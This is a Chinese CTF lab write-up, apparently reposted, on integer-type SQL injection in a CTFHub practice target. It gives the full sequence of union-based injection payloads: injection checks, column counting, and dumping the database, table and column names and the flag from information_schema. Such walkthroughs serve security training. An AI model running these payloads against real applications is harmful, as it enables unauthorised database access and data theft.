当前位置: 首页 > article >正文

CTFHUB技能树之SQL——整数型注入

article 2024/10/21 22:12:03

开启靶场,打开链接:

直接指明是SQL整数型注入,但还是来判断一下

(1)检查是否存在注入点

1 and 1=1#

返回正确

1 and 1=2#

返回错误

说明存在SQL整数型注入

(2)猜字段数

1 order by 2#

1 order by 3#

说明字段数是2

(3)爆数据库名

1 and 1=2 union select 1,database()#

得知数据库名是sqli

(4)爆表名

1 and 1=2 union select 1,group_concat(table_name)from information_schema.tables where table_schema='sqli'#

显示表名是news表和flag表,其中flag表是我们需要的

(5)爆列名

1 and 1=2 union select 1,column_name from information_schema.columns where table_schema='sqli' and table_name='flag'#

得知flag表的列名是flag

(6)爆字段内容(flag)

1 and 1=2 union select 1,group_concat(flag) from sqli.flag#

成功的得到flag:

ctfhub{0bdb6d621fc76a06fde34a00}

这里用sqlmap也是可以的,但我提前交了就不想再费时间重开一遍靶场了,待会就在“字符型注入”中试试了


http://www.kler.cn/news/359285.html

相关文章:

  • .net framework 3.5sp1插件怎么安装
  • 【机器学习】任务七:聚类算法 (K-means 算法、层次聚类、密度聚类对鸢尾花(Iris)数据进行聚类)
  • 什么SNMP协议,怎么使用python调用SNMP访问设备
  • 【移动应用开发】界面设计(二)实现水果列表页面
  • 关于测试用例的写法
  • 云原生-降本增效最佳案例分享-学习笔记
  • WEB前端作业1
  • GO语言指针有那些限制
  • QT sql驱动错误QMYSQL driver not loaded
  • 离线安装bitnami-gitlab8.8.4+汉化
  • Linux第一讲:Linux基本指令
  • Vue - Element 选择器 el-select 既可以选择下拉又可以手动输入文本功能(手动输入的值只能是数字 并且支持4位小数)
  • Python单个数值字符串转化成时间戳
  • Unity水体交互
  • C++之《剑指offer》学习记录(5):数组中重复的数
  • MySQL 设计数据表
  • Android 中获取和读取短信验证码
  • es索引库操作和使用RestHignLevelClient客户端操作es
  • 家用wifi的ip地址固定吗?换wifi就是换ip地址吗
  • 【Linux】了解pthread线程库,清楚并没有线程创建接口,明白Linux并不存在真正意义的线程(附带模型图详解析)